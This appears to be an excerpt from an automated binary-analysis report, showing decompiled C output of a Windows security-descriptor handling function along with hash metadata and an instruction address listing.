                                                • String ID: *.*$MUI
                                                • API String ID: 0-3752369296
                                                • Opcode ID: 422762829d80f5bcb5e505e44746c2bd2b9235e1f533f559451e232298fde957
                                                • Instruction ID: d33bf7f726b6a7f8cf67e940d6ee5f835ca167e71c5b0fb138fcd097c6a4d460
                                                • Opcode Fuzzy Hash: 422762829d80f5bcb5e505e44746c2bd2b9235e1f533f559451e232298fde957
                                                • Instruction Fuzzy Hash: 69C170359016289ACB70DF68CD89BEAB7B8EF49310F0085DAE549E7190EB749FC4CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0093D47D, Relevance: 2.4, Strings: 1, Instructions: 1138COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E0093D47D(unsigned char __edx, intOrPtr _a4, unsigned char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				char _v136;
				signed int _v137;
				char _v138;
				char _v139;
				signed int _v144;
				signed char _v148;
				signed char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				signed char _v160;
				signed char _v164;
				unsigned char _v168;
				intOrPtr _v172;
				signed int _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr _v208;
				char _v209;
				char _v216;
				signed int _v220;
				signed char _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				intOrPtr _v240;
				signed char _v244;
				signed int _v248;
				signed char _v252;
				signed char _v256;
				signed char _v260;
				signed char _v264;
				signed char* _v268;
				void* _v272;
				char _v276;
				signed char* _v280;
				char _v284;
				signed char* _v288;
				signed int _v292;
				void* _v296;
				signed char* _v300;
				unsigned char _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				char _v324;
				intOrPtr* _v332;
				char _v335;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char* _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				char _v368;
				void* _v384;
				char _v388;
				char _v408;
				intOrPtr _v436;
				char _v440;
				char _v464;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t545;
				unsigned char _t557;
				signed char _t581;
				intOrPtr _t582;
				signed char _t598;
				signed int _t602;
				signed int _t604;
				intOrPtr _t610;
				signed int _t622;
				void* _t623;
				intOrPtr _t624;
				signed int _t625;
				signed int _t628;
				char _t633;
				signed char _t636;
				signed int _t638;
				signed int _t640;
				signed int _t641;
				intOrPtr _t645;
				intOrPtr _t654;
				signed char _t680;
				char _t685;
				intOrPtr _t695;
				intOrPtr _t699;
				signed int _t708;
				intOrPtr _t709;
				signed int _t711;
				intOrPtr _t714;
				signed char _t718;
				signed int _t726;
				signed int _t730;
				signed char _t731;
				signed char _t735;
				signed int _t736;
				signed int _t739;
				intOrPtr _t740;
				signed char _t743;
				char _t746;
				unsigned char _t769;
				signed int _t776;
				intOrPtr _t777;
				signed int _t792;
				intOrPtr _t793;
				intOrPtr _t794;
				signed short _t803;
				unsigned char _t808;
				intOrPtr _t809;
				intOrPtr _t810;
				intOrPtr _t811;
				intOrPtr _t812;
				signed char _t813;
				intOrPtr _t814;
				intOrPtr _t815;
				intOrPtr _t816;
				void* _t817;
				void* _t818;
				intOrPtr _t823;
				unsigned char _t824;
				signed int _t825;
				signed int _t826;
				intOrPtr _t828;
				unsigned char _t829;
				char _t831;
				signed int _t832;
				char _t833;
				char _t834;
				signed char _t835;
				signed int _t839;
				void* _t840;
				void* _t841;

				_t801 = __edx;
				_t545 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t545 ^ _t839;
				_v188 = _a4;
				_v332 = _a12;
				_v200 = _a16;
				_v208 = _a36;
				_v232 =  &_v136;
				_v244 = 0;
				_t821 = _a32;
				_t808 = _a8;
				_v172 = _t821;
				_v148 = 0;
				_v139 = 0;
				_v177 = 0;
				_v152 = 0;
				_v252 = 0;
				_v138 = 0;
				_v153 = 0;
				_v156 = 0;
				_v209 = 0;
				_v155 = 0;
				_v182 = 0;
				_v179 = 0;
				_v160 = 0;
				_v260 = 0;
				_v204 = 0;
				_v224 = 0;
				_v256 = 0;
				_v236 = 0;
				_v192 = 0;
				_v144 = 0x8000;
				_v220 = 0;
				_v216 = 0;
				_v248 = 0;
				_v176 = 0;
				_v137 = 0;
				_v181 = 1;
				_v178 = 1;
				_v280 = 0;
				_v288 = 0;
				_v272 = 0;
				_v296 = 0;
				_v300 = 0;
				_v268 = 0;
				_v240 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18));
				if(_t821 == 0) {
					L3:
					if(_t808 == 0) {
						_v180 = 0;
						E0090D68D( &_v408, 1);
						_t808 =  &_v408;
					} else {
						_v180 = 1;
					}
					_t557 =  *(_t808 + 2) & 0x0000ffff;
					_t801 = _t557 >> 7;
					_v168 = _t808;
					_v304 = _t801;
					_v264 = _t557 >> 0x00000006 & 0x00000001;
					if(_t821 == 0) {
						if(_t801 != 0) {
							goto L6;
						}
						goto L8;
					} else {
						L6:
						if(E0093D185(_t821,  &_v280,  &_v288,  &_v272,  &_v300,  &_v296,  &_v268) < 0) {
							L97:
							return E008FE1B4(_t566, 0, _v8 ^ _t839, _t801, _t808, _t821);
						} else {
							_v160 =  *_v280;
							_t801 = _v304;
							_v260 =  *_v288;
							_v236 =  *_v272;
							_v204 =  *_v296;
							_v224 =  *_v300;
							_v256 =  *_v268;
							L8:
							_v196 =  *(_t808 + 2) & 0x0000ffff;
							_t581 =  *(_t808 + 4);
							_t83 =  &_v196;
							 *_t83 = _v196 & 0x00008000;
							if( *_t83 != 0) {
								if(_t581 == 0) {
									L140:
									if((_a28 & 0x00000020) != 0) {
										_t582 = _v188;
										if(_t582 != 0) {
											_t748 =  *(_t582 + 4);
											if(( *(_t582 + 2) & 0x00008000) == 0) {
												L174:
												_v164 = _t748;
												L175:
												_v153 = 1;
												if(_v164 == 0) {
													goto L169;
												}
												L12:
												_t748 =  *(_t808 + 8);
												if(_v196 != 0) {
													if(_t748 == 0) {
														L135:
														if((_a28 & 0x00000040) != 0) {
															if(_t582 != 0) {
																if(( *(_t582 + 2) & 0x00008000) == 0) {
																	_t598 =  *(_t582 + 8);
																	L138:
																	_v160 = _t598;
																	if(_t598 != 0) {
																		L14:
																		_t803 =  *(_t808 + 2) & 0x0000ffff;
																		if((_t803 & 0x00000010) != 0) {
																			if(_v196 != 0) {
																				_t809 =  *((intOrPtr*)(_t808 + 0xc));
																				if(_t809 == 0) {
																					goto L15;
																				}
																				_t823 = _t809 + _v168;
																				L16:
																				_t810 = _v188;
																				if(_t810 == 0) {
																					L18:
																					_t811 = 0;
																					L19:
																					_t801 =  &_v148;
																					_v260 = _a28 >> 0x00000002 & 0x00000001;
																					_t748 = ((_t803 & 0x0000ffff) >> 0x00000001 & 0x00000018 | _t803 & 0x2800) >> 1;
																					_t808 = E0093DD52(_t811, _t823, ((_t803 & 0x0000ffff) >> 0x00000001 & 0x00000018 | _t803 & 0x2800) >> 1, _a24, _a28 >> 0x00000001 & 1, _a28 >> 0x00000002 & 0x00000001, _v164, _v160, _v224, _v256, _v208, 2, _v200, _a20,  &_v148,  &_v156,  &_v228);
																					if(_t808 >= 0) {
																						_t602 = _v228;
																						_t824 = _v168;
																						_t766 = _t602 & 0x00000008 | 0x00002004;
																						_t768 = (_t602 & 0x00000008 | 0x00002004) + _t766 | _t602 & 0x00001400;
																						_t748 = ((_t602 & 0x00000008 | 0x00002004) + _t766 | _t602 & 0x00001400) + _t768;
																						_v139 = 1;
																						_v144 = ((_t602 & 0x00000008 | 0x00002004) + _t766 | _t602 & 0x00001400) + _t768;
																						L24:
																						if((_a28 & 0x00000100) != 0) {
																							_v176 = 1;
																						}
																						if((_a28 & 0x00000200) != 0) {
																							_v176 = _v176 | 0x00000002;
																						}
																						if((_a28 & 0x00000400) != 0) {
																							_v176 = _v176 | 0x00000004;
																						}
																						if(_v176 != 0) {
																							_t825 = 0;
																							goto L31;
																						} else {
																							_t730 =  *(_t824 + 2) & 0x0000ffff;
																							if((_t730 & 0x00000010) != 0) {
																								_t731 =  *(_t824 + 0xc);
																								if((_t730 & 0x00008000) == 0) {
																									L30:
																									_t825 = E0093D45E(_t731, 0x11, 0);
																									if(_t825 != 0) {
																										L111:
																										_t305 = _t825 + 8; // 0x8
																										_v220 = _t305;
																										_v176 =  *((intOrPtr*)(_t825 + 4));
																										_t735 =  *((intOrPtr*)(_t825 + 1));
																										_v137 = _t735;
																										if(_t735 == 8) {
																											L201:
																											_t825 = 0;
																											_v220 = 0;
																											_v176 = 0;
																											_v137 = 0;
																											goto L31;
																										}
																										if((_t735 & 0x00000010) == 0) {
																											goto L31;
																										}
																										goto L201;
																									}
																									L31:
																									_t604 = _v204;
																									if((_v137 & 0x00000008) != 0) {
																										if( *((intOrPtr*)(_t604 + 8)) >= 0x2000) {
																											goto L32;
																										}
																										_t808 = 0xc0000446;
																										L89:
																										if(_v244 != 0) {
																											E008FE025(_t748,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v244);
																										}
																										if(_v179 != 0) {
																											if(_v252 != 0) {
																												E008FE025(_t748,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v252);
																											}
																										}
																										_t821 = _v240;
																										E008FE025(_t748, _v240, 0, _v280);
																										E008FE025(_t748, _v240, 0, _v296);
																										E008FE025(_t748, _v240, 0, _v288);
																										E008FE025(_t748, _v240, 0, _v272);
																										E008FE025(_t748, _t821, 0, _v300);
																										E008FE025(_t748, _t821, 0, _v268);
																										if(_v139 != 0 || _v177 != 0) {
																											if(_v148 != 0) {
																												E008FE025(_t748, _t821, 0, _v148);
																											}
																										}
																										if(_v138 != 0 && _v152 != 0) {
																											E008FE025(_t748, _t821, 0, _v152);
																										}
																										 *_v332 = _v192;
																										_t566 = _t808;
																										goto L97;
																									}
																									L32:
																									if(_v176 != 0) {
																										L114:
																										if(_t825 != 0) {
																											L35:
																											if(_v220 != 0) {
																												L116:
																												_t808 = E0090D71A( &_v136, 0x80, 2);
																												if(_t808 < 0) {
																													goto L89;
																												}
																												_t808 = E009396F5(_t808,  &_v136, 2, _v137 & 0x000000ff, _v220, 0x11, _v176);
																												if(_t808 >= 0) {
																													goto L37;
																												}
																												goto L89;
																											} else {
																												_v232 = 0;
																												L37:
																												_t812 = _v188;
																												if((_a28 & 0x00000700) != 0) {
																													_t748 = 4;
																												} else {
																													if(_t825 != 0 || _v232 == 0) {
																														_t748 = (( *(_v168 + 2) & 0x0000ffff) >> 0x00000001 & 0x00000018 |  *(_v168 + 2) & 0x2800) >> 1;
																													} else {
																														_t748 = 0;
																													}
																												}
																												if(_t812 == 0) {
																													L43:
																													_t610 = 0;
																													goto L44;
																												} else {
																													_t726 =  *(_t812 + 2) & 0x0000ffff;
																													if((_t726 & 0x00000010) != 0) {
																														_t610 =  *((intOrPtr*)(_t812 + 0xc));
																														if((_t726 & 0x00008000) == 0) {
																															L44:
																															_t801 =  &_v216;
																															_t808 = E0093DD52(_t610, _v232, _t748, _a24, 1, 0, _v164, _v160, _v224, _v256, _v208, 3, _v200, _a20,  &_v216,  &_v209,  &_v228);
																															if(_t808 != 0x8000000b) {
																																if(_t808 < 0) {
																																	goto L89;
																																}
																																_t826 = _v228;
																																goto L46;
																															} else {
																																_t826 = 0;
																																_v216 = _v232;
																																_v228 = 0;
																																L46:
																																_t808 = E0093D425(_t748, _v216, _v148,  &_v248);
																																if(_v216 != 0) {
																																	if(_v216 != _v232) {
																																		E008FE025(_t748, _v240, 0, _v216);
																																	}
																																}
																																if(_t808 < 0) {
																																	goto L89;
																																} else {
																																	_t813 = _v248;
																																	if(_t813 != 0) {
																																		if(_v139 != 0) {
																																			if(_v148 != 0) {
																																				E008FE025(_t748, _v240, 0, _v148);
																																			}
																																		}
																																		_v144 = _v144 | ((_t826 & 0x00000008 | 0x00000004) + (_t826 & 0x00000008 | 0x00000004) | _t826 & 0x00001400) + ((_t826 & 0x00000008 | 0x00000004) + (_t826 & 0x00000008 | 0x00000004) | _t826 & 0x00001400);
																																		_v148 = _t813;
																																		_v177 = 1;
																																	}
																																	_t622 = _a28 & 0x00000008;
																																	_v248 = _t622;
																																	if(_t622 == 0) {
																																		_t623 = E0093D45E(_v148, 0x11, 0);
																																		if(_t623 != 0) {
																																			_t624 = _t623 + 8;
																																		} else {
																																			_t624 = _v220;
																																		}
																																		if(_t624 == 0) {
																																			goto L50;
																																		} else {
																																			if(_v172 == 0) {
																																				goto L177;
																																			} else {
																																				_t748 =  &_v178;
																																				_t808 = E009831C5(0, _v204, _t624,  &_v178);
																																				if(_t808 < 0) {
																																					goto L89;
																																				}
																																				if(_v178 == 0) {
																																					_v182 = 1;
																																				}
																																				goto L50;
																																			}
																																			goto L149;
																																		}
																																	} else {
																																		L50:
																																		_t769 = _v168;
																																		_t625 =  *(_t769 + 2) & 0x0000ffff;
																																		if((_t625 & 0x00000004) == 0) {
																																			L98:
																																			_t828 = 0;
																																			L53:
																																			_t814 = _v188;
																																			if(_t814 == 0) {
																																				L99:
																																				_t815 = 0;
																																				L58:
																																				_t748 = _a28 & 1;
																																				_t808 = E0093DD52(_t815, _t828, _t625 & 0x0000140c, _a24, _a28 & 1, _v260, _v164, _v160, _v224, _v256, _v208, 1, _v200, _a20,  &_v152,  &_v155,  &_v228);
																																				if(_t808 < 0) {
																																					if(_t808 != 0x8000000b) {
																																						goto L89;
																																					}
																																					if((_a28 & 0x00000001) != 0) {
																																						_v144 = _v144 | 0x00000400;
																																					}
																																					_t829 = _v168;
																																					_t628 =  *(_t829 + 2) & 0x0000ffff;
																																					_t748 = _t628 & 0x0000000c;
																																					if((_t628 & 0x0000000c) == 0xc) {
																																						if((_t628 & 0x00000004) != 0) {
																																							_t748 =  *(_t829 + 0x10);
																																							if((_t628 & 0x00008000) == 0) {
																																								L224:
																																								_v152 = _t748;
																																								L225:
																																								_v144 = _v144 | _t628 & 0x00001000 | 0x00000004;
																																								_v155 = 1;
																																								goto L60;
																																							}
																																							if(_t748 == 0) {
																																								goto L220;
																																							}
																																							_t748 = _t748 + _t829;
																																							goto L224;
																																						}
																																						L220:
																																						_v152 = 0;
																																						goto L225;
																																					} else {
																																						_t718 = _v236;
																																						if(_t718 != 0) {
																																							_v144 = _v144 | 0x00000004;
																																							_v152 = _t718;
																																						}
																																						L60:
																																						if((_a28 & 0x00001000) == 0) {
																																							L149:
																																							if(_v180 == 0 || _v172 == 0 || _v188 == 0) {
																																								goto L61;
																																							} else {
																																								_v388 = 0;
																																								asm("stosd");
																																								asm("stosd");
																																								asm("stosd");
																																								asm("stosd");
																																								_t831 = 1;
																																								_v196 = 0;
																																								_v276 = 0;
																																								_v168 = 0;
																																								_v284 = 0x14;
																																								_t808 = E0093D47D(_t801, _v188, 0,  &_v244, _v200, _a20, _a24, _a28 | 1, _v172, _v208);
																																								if(_t808 < 0) {
																																									goto L89;
																																								}
																																								_t748 = _v244;
																																								_t708 =  *(_t748 + 2) & 0x0000ffff;
																																								if((_t708 & 0x00000004) != 0) {
																																									if((_t708 & 0x00008000) == 0) {
																																										_t709 =  *((intOrPtr*)(_t748 + 0x10));
																																										L235:
																																										if(E00982B83(0, _t801, _t808, 0x10, _t709) == 0) {
																																											L62:
																																											if((_a28 & 0x00000001) != 0 && _v152 == 0) {
																																												_v144 = _v144 | 0x00001000;
																																											}
																																											if(_v156 != 0) {
																																												if(_v248 != 0) {
																																													goto L65;
																																												}
																																												if(_v172 == 0) {
																																													goto L177;
																																												}
																																												_t699 = 8;
																																												_v316 = _t699;
																																												_push( &_v154);
																																												_push( &_v324);
																																												_v324 = _t831;
																																												_v320 = _t831;
																																												_v312 = 0;
																																												_v308 = 0;
																																												_t808 = E008F1220(_v172);
																																												if(_t808 < 0) {
																																													goto L89;
																																												}
																																												if(_v154 != 0) {
																																													goto L65;
																																												}
																																												goto L250;
																																											} else {
																																												L65:
																																												if(_v182 != 0) {
																																													if(_v248 != 0) {
																																														goto L66;
																																													}
																																													if(_v172 == 0) {
																																														L177:
																																														_t808 = 0xc000007c;
																																														goto L89;
																																													}
																																													_t695 = 0x20;
																																													_v316 = _t695;
																																													_push( &_v154);
																																													_push( &_v324);
																																													_v324 = _t831;
																																													_v320 = _t831;
																																													_v312 = 0;
																																													_v308 = 0;
																																													_t808 = E008F1220(_v172);
																																													if(_t808 < 0) {
																																														goto L89;
																																													}
																																													if(_v154 != 0) {
																																														goto L66;
																																													}
																																													L250:
																																													_t808 = 0xc0000061;
																																													goto L89;
																																												}
																																												L66:
																																												if(_v153 == 0 || (_a28 & 0x00000010) != 0) {
																																													L68:
																																													if(_v155 == 0 || _v304 == 0) {
																																														L70:
																																														_t633 = 8 + ( *(_v164 + 1) & 0x000000ff) * 4;
																																														_v284 = _t633;
																																														_t776 = 0xfffffffc;
																																														_v204 = _t633 + 0x00000003 & _t776;
																																														_t636 = _v160;
																																														if(_t636 != 0) {
																																															_t685 = 8 + ( *(_t636 + 1) & 0x000000ff) * 4;
																																															_v276 = _t685;
																																															_v236 = _t685 + 0x00000003 & _t776;
																																														}
																																														_t638 = _v144 & 0x00000010;
																																														_v264 = _t638;
																																														if(_t638 != 0) {
																																															if(_v148 == 0) {
																																																goto L73;
																																															}
																																															_t832 = ( *(_v148 + 2) & 0x0000ffff) + 0x00000003 & _t776;
																																															goto L74;
																																														} else {
																																															L73:
																																															_t832 = 0;
																																															L74:
																																															_t640 = _v144 & 0x00000004;
																																															_v292 = _t640;
																																															if(_t640 == 0) {
																																																L155:
																																																_t641 = 0;
																																																L77:
																																																_t801 = _v204;
																																																_t777 =  *0x9d0058; // 0x0
																																																_v200 = _t641;
																																																_t748 = _t777 + 0x140000;
																																																_t645 = E008FE0C6(_v240, _t777 + 0x140000, _t641 + _t832 + _v236 + _v204 + 0x14);
																																																_v192 = _t645;
																																																if(_t645 == 0) {
																																																	_t808 = 0xc0000017;
																																																} else {
																																																	_t816 = _v192;
																																																	E0090D68D(_t816, 1);
																																																	 *(_t816 + 2) =  *(_t816 + 2) | _v144;
																																																	_t817 = _t816 + 0x14;
																																																	if(_v264 != 0) {
																																																		if(_v148 == 0) {
																																																			 *((intOrPtr*)(_v192 + 0xc)) = 0;
																																																		} else {
																																																			E008F2340(_t817, _v148,  *(_v148 + 2) & 0x0000ffff);
																																																			_t840 = _t840 + 0xc;
																																																			if(_v139 == 0) {
																																																				E00942FB5(_t817, _v208);
																																																			}
																																																			 *((intOrPtr*)(_v192 + 0xc)) = _t817 - _v192;
																																																			if(_t832 > ( *(_v148 + 2) & 0x0000ffff)) {
																																																				E008FDFC0(( *(_v148 + 2) & 0x0000ffff) + _t817, 0, _t832 - ( *(_v148 + 2) & 0x0000ffff));
																																																				_t840 = _t840 + 0xc;
																																																			}
																																																			_t817 = _t817 + _t832;
																																																		}
																																																	}
																																																	if(_v292 != 0) {
																																																		if(_v152 == 0) {
																																																			 *((intOrPtr*)(_v192 + 0x10)) = 0;
																																																		} else {
																																																			_t835 = _v152;
																																																			E008F2340(_t817, _t835,  *(_t835 + 2) & 0x0000ffff);
																																																			_t840 = _t840 + 0xc;
																																																			if(_v138 == 0) {
																																																				E00942FB5(_t817, _v208);
																																																			}
																																																			 *((intOrPtr*)(_v192 + 0x10)) = _t817 - _v192;
																																																			if(_v200 > ( *(_t835 + 2) & 0x0000ffff)) {
																																																				E008FDFC0(( *(_t835 + 2) & 0x0000ffff) + _t817, 0, _v200 - ( *(_t835 + 2) & 0x0000ffff));
																																																				_t840 = _t840 + 0xc;
																																																			}
																																																			_t817 = _t817 + _v200;
																																																		}
																																																	}
																																																	_t833 = _v284;
																																																	E008F2340(_t817, _v164, _t833);
																																																	_t841 = _t840 + 0xc;
																																																	if(_v204 > _t833) {
																																																		E008FDFC0(_t833 + _t817, 0, _v204 - _t833);
																																																		_t841 = _t841 + 0xc;
																																																	}
																																																	_t654 = _v192;
																																																	_t818 = _t817 + _v204;
																																																	_t748 = _t817 - _t654;
																																																	 *(_t654 + 4) = _t817 - _t654;
																																																	if(_v160 != 0) {
																																																		_t834 = _v276;
																																																		E008F2340(_t818, _v160, _t834);
																																																		_t656 = _v236;
																																																		if(_v236 > _t834) {
																																																			E008FDFC0(_t834 + _t818, 0, _t656 - _t834);
																																																		}
																																																		 *((intOrPtr*)(_v192 + 8)) = _t818 - _v192;
																																																	}
																																																	_t808 = 0;
																																																}
																																																goto L89;
																																															}
																																															_t680 = _v152;
																																															if(_t680 == 0) {
																																																goto L155;
																																															}
																																															_t641 = ( *(_t680 + 2) & 0x0000ffff) + 0x00000003 & _t776;
																																															goto L77;
																																														}
																																													} else {
																																														_t808 = E00982998(_t748, _v152, _v264, _v224,  &_v252,  &_v179);
																																														if(_t808 < 0) {
																																															goto L89;
																																														}
																																														if(_v138 != 0 && _v152 != 0) {
																																															E008FE025(_t748, _v240, 0, _v152);
																																														}
																																														_v152 = _v252;
																																														_v252 = 0;
																																														goto L70;
																																													}
																																												} else {
																																													if(_v172 == 0) {
																																														goto L177;
																																													}
																																													_push( &_v292);
																																													_push(_v304);
																																													_push(_v164);
																																													_push(_v172);
																																													if(E009825A3(_t801, _t808) != 0) {
																																														goto L68;
																																													}
																																													_t808 = _v292;
																																													goto L89;
																																												}
																																											}
																																										}
																																										if(_v181 != 1) {
																																											L238:
																																											_t711 = _v196;
																																											if(_t711 == 0) {
																																												_t711 = _v172;
																																											}
																																											_push( &_v168);
																																											_push( &_v276);
																																											_push( &_v284);
																																											_t748 =  &_v388;
																																											_push( &_v388);
																																											_push(_v208);
																																											_push(0x40000);
																																											_push(_t711);
																																											_t808 = E008F0238(_v244);
																																											if(_v196 != 0) {
																																												E008EF9F0(_v196);
																																											}
																																											if(_t808 >= 0) {
																																												_t808 = _v168;
																																												if(_t808 >= 0) {
																																													goto L62;
																																												}
																																											}
																																											goto L89;
																																										}
																																										_t714 = 2;
																																										_v348 =  &_v344;
																																										_t748 =  &_v196;
																																										_push( &_v196);
																																										_push(_t714);
																																										_push(0);
																																										_v340 = _t714;
																																										_push( &_v368);
																																										_push(8);
																																										_v344 = 0xc;
																																										_v336 = 1;
																																										_v335 = 0;
																																										_v368 = 0x18;
																																										_v364 = 0;
																																										_v356 = 0;
																																										_v360 = 0;
																																										_v352 = 0;
																																										_t808 = E008EFEE8(_v172);
																																										if(_t808 < 0) {
																																											goto L89;
																																										}
																																										goto L238;
																																									}
																																									if( *((intOrPtr*)(_t748 + 0x10)) == 0) {
																																										goto L230;
																																									}
																																									_t709 =  *((intOrPtr*)(_t748 + 0x10)) + _t748;
																																									goto L235;
																																								}
																																								L230:
																																								_t709 = 0;
																																								goto L235;
																																							}
																																						}
																																						L61:
																																						_t831 = 1;
																																						goto L62;
																																					}
																																				}
																																				_v144 = _v144 | _v228 & 0x00001408 | 0x00000004;
																																				_v138 = 1;
																																				goto L60;
																																			}
																																			_t792 =  *(_t814 + 2) & 0x0000ffff;
																																			if((_t792 & 0x00000004) == 0) {
																																				goto L99;
																																			}
																																			if((_t792 & 0x00008000) == 0) {
																																				_t815 =  *((intOrPtr*)(_t814 + 0x10));
																																				goto L58;
																																			}
																																			_t793 =  *((intOrPtr*)(_t814 + 0x10));
																																			if(_t793 == 0) {
																																				goto L99;
																																			}
																																			_t815 = _t814 + _t793;
																																			goto L58;
																																		}
																																		if((_t625 & 0x00008000) != 0) {
																																			_t794 =  *((intOrPtr*)(_t769 + 0x10));
																																			if(_t794 == 0) {
																																				goto L98;
																																			}
																																			_t801 = _v168;
																																			_t828 = _t794 + _v168;
																																			goto L53;
																																		}
																																		_t828 =  *((intOrPtr*)(_v168 + 0x10));
																																		goto L53;
																																	}
																																}
																															}
																														}
																														if(_t610 == 0) {
																															goto L43;
																														}
																														_t610 = _t610 + _t812;
																														goto L44;
																													}
																													goto L43;
																												}
																											}
																										}
																										if(_v172 == 0) {
																											goto L177;
																										} else {
																											_v220 = _t604;
																											_v137 = 0;
																											goto L35;
																										}
																										goto L116;
																									}
																									if(_t604 == 0 ||  *((intOrPtr*)(_t604 + 8)) >= 0x2000) {
																										goto L35;
																									} else {
																										_v176 = 1;
																										goto L114;
																									}
																								}
																								if(_t731 == 0) {
																									goto L29;
																								} else {
																									_t731 = _t731 + _t824;
																									goto L30;
																								}
																								goto L111;
																							}
																							L29:
																							_t731 = 0;
																							goto L30;
																						}
																					}
																					if(_t808 != 0x8000000b) {
																						goto L89;
																					} else {
																						if((_a28 & 0x00000002) != 0) {
																							_v144 = 0x8800;
																						}
																						_t824 = _v168;
																						_t736 =  *(_t824 + 2) & 0x0000ffff;
																						_t748 = _t736 & 0x00000030;
																						if((_t736 & 0x00000030) == 0x30) {
																							if((_t736 & 0x00000010) != 0) {
																								_t748 =  *(_t824 + 0xc);
																								if((_t736 & 0x00008000) == 0) {
																									L194:
																									_v148 = _t748;
																									L195:
																									_v144 = _v144 | _t736 & 0x00002000 | 0x00000010;
																									_v156 = 1;
																									goto L24;
																								}
																								if(_t748 == 0) {
																									goto L190;
																								}
																								_t748 = _t748 + _t824;
																								goto L194;
																							}
																							L190:
																							_v148 = 0;
																							goto L195;
																						}
																						goto L24;
																					}
																				}
																				_t739 =  *(_t810 + 2) & 0x0000ffff;
																				if((_t739 & 0x00000010) != 0) {
																					if((_t739 & 0x00008000) == 0) {
																						_t811 =  *((intOrPtr*)(_t810 + 0xc));
																						goto L19;
																					}
																					_t740 =  *((intOrPtr*)(_t810 + 0xc));
																					if(_t740 == 0) {
																						goto L18;
																					}
																					_t811 = _t810 + _t740;
																					goto L19;
																				}
																				goto L18;
																			}
																			_t823 =  *((intOrPtr*)(_v168 + 0xc));
																			goto L16;
																		}
																		L15:
																		_t823 = 0;
																		goto L16;
																	}
																	goto L167;
																}
																_t748 =  *(_t582 + 8);
																if(_t748 == 0) {
																	goto L167;
																}
																_t598 = _t582 + _t748;
																goto L138;
															}
															L167:
															_t808 = 0xc000005b;
															goto L89;
														}
														_t598 = _v256;
														if(_t801 == 0) {
															_t598 = _v260;
														}
														goto L138;
													}
													_t748 = _t748 + _t808;
												}
												_v160 = _t748;
												if(_t748 == 0) {
													goto L135;
												}
												goto L14;
											}
											if(_t748 != 0) {
												_t748 = _t748 + _t582;
												goto L174;
											}
											_v164 = 0;
											goto L175;
										}
										L169:
										_t808 = 0xc000005a;
										goto L89;
									}
									_t743 = _v224;
									if(_t801 == 0) {
										_t743 = _v160;
									}
									_v164 = _t743;
									if(_t743 != 0) {
										L11:
										_t582 = _v188;
										goto L12;
									} else {
										goto L177;
									}
								}
								_t581 = _t581 + _t808;
							}
							_v164 = _t581;
							if(_t581 == 0) {
								goto L140;
							} else {
								_v153 = 1;
								goto L11;
							}
						}
					}
				}
				_push( &_v264);
				_push(0x38);
				_push( &_v464);
				_push(0xa);
				if(E008EFBB8(_t821) < 0) {
					goto L97;
				}
				_t746 = _v440;
				_v181 = _t746;
				if(_t746 == 2) {
					if(_v436 >= 1) {
						goto L3;
					}
					_t566 = 0xc00000a5;
					goto L97;
				}
				goto L3;
			}























































































































































                                                0x0093d47d
                                                0x0093d488
                                                0x0093d48f
                                                0x0093d495
                                                0x0093d49e
                                                0x0093d4a7
                                                0x0093d4b0
                                                0x0093d4bf
                                                0x0093d4cb
                                                0x0093d4d8
                                                0x0093d4dc
                                                0x0093d4df
                                                0x0093d4e5
                                                0x0093d4eb
                                                0x0093d4f1
                                                0x0093d4f7
                                                0x0093d4fd
                                                0x0093d503
                                                0x0093d509
                                                0x0093d50f
                                                0x0093d515
                                                0x0093d51b
                                                0x0093d521
                                                0x0093d527
                                                0x0093d52d
                                                0x0093d533
                                                0x0093d539
                                                0x0093d53f
                                                0x0093d545
                                                0x0093d54b
                                                0x0093d551
                                                0x0093d557
                                                0x0093d561
                                                0x0093d567
                                                0x0093d56d
                                                0x0093d573
                                                0x0093d579
                                                0x0093d57f
                                                0x0093d586
                                                0x0093d58d
                                                0x0093d593
                                                0x0093d599
                                                0x0093d59f
                                                0x0093d5a5
                                                0x0093d5ab
                                                0x0093d5b1
                                                0x0093d5b9
                                                0x0093d5f0
                                                0x0093d5f2
                                                0x0094832f
                                                0x00948335
                                                0x0094833a
                                                0x0093d5f8
                                                0x0093d5f8
                                                0x0093d5f8
                                                0x0093d5ff
                                                0x0093d608
                                                0x0093d60d
                                                0x0093d613
                                                0x0093d619
                                                0x0093d621
                                                0x009483db
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0093d627
                                                0x0093d627
                                                0x0093d659
                                                0x0093dd3c
                                                0x0093dd4a
                                                0x0093d65f
                                                0x0093d667
                                                0x0093d675
                                                0x0093d67b
                                                0x0093d689
                                                0x0093d697
                                                0x0093d6a5
                                                0x0093d6b3
                                                0x0093d6b9
                                                0x0093d6bd
                                                0x0093d6c3
                                                0x0093d6cb
                                                0x0093d6cb
                                                0x0093d6d1
                                                0x009487f7
                                                0x00948372
                                                0x00948376
                                                0x00958737
                                                0x0095873f
                                                0x00958751
                                                0x00958754
                                                0x00958764
                                                0x00958764
                                                0x0095876a
                                                0x0095876a
                                                0x00958777
                                                0x00000000
                                                0x00000000
                                                0x0093d6f2
                                                0x0093d6f2
                                                0x0093d6fc
                                                0x00948806
                                                0x00948345
                                                0x00948349
                                                0x0095872b
                                                0x0095878c
                                                0x0095879c
                                                0x0094835f
                                                0x0094835f
                                                0x00948367
                                                0x0093d710
                                                0x0093d710
                                                0x0093d717
                                                0x0094338b
                                                0x009587a4
                                                0x009587a9
                                                0x00000000
                                                0x00000000
